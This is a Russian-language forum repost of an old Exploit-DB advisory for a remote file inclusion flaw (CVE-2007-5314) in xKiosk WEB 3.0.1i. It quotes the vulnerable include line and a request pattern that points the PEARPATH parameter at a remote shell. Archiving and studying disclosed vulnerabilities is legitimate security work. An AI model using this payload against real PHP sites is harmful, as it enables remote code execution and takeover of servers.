Exploit xKiosk 3.0.1i - 'xkurl.php?PEARPATH' Remote File Inclusion

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
4502
Проверка EDB
  1. Пройдено
Автор
H4CK3R
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2007-5314
Дата публикации
2007-10-08
Код:
xKiosk WEB <= (PEARPATH) Remote File Include Vulnerability

Script : xKiosk WEB

Version : 3.0.1i

Download : http://xkiosk.net/xkiosk.3.0.1j.web.zip

AUTHOR : BorN To K!LL

Vuln Code :

include($PEARPATH.'Client.php');

3xpl0!T :

[p4th]/system/funcs/xkurl.php?PEARPATH=[-SHell-]

Greetings 2 :

str0ke - Dr.2 - AsbMay's Group - GoLd_M - KuWaiT SeCuriTy ..

BorN To K!LL <> GoLd_M = 4ever ... =P

# milw0rm.com [2007-10-08]
 
Источник
www.exploit-db.com